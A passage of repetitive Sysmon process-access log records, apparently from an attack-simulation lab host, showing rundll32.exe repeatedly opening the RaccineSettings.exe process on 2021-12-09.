Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043235Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043234Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043233Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043232Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043231Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043230Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043229Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043228Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.863{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043227Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.862{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043226Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.862{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043225Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.862{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043224Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.862{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043223Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.862{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043222Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.862{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043221Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.862{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043220Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.862{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002008630Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.034{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA5106C) 10341000x80000000000000002003645Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003644Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003643Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003642Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003641Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003640Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003639Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003638Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003637Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003636Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003635Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003634Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003633Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003632Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003631Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003630Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003629Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003628Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003627Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003626Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003625Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003624Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003623Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003622Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003621Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003620Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003619Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003618Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003617Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003616Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003615Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.483{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003614Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003613Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003612Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003611Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003610Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003609Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003608Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003607Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003606Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003605Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003604Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003603Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003602Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003601Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003600Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000018F8D368C59) 10341000x80000000000000002003599Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:02.482{9DBE88B5-2F45-61B2-A403-010000000E02}79725280C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 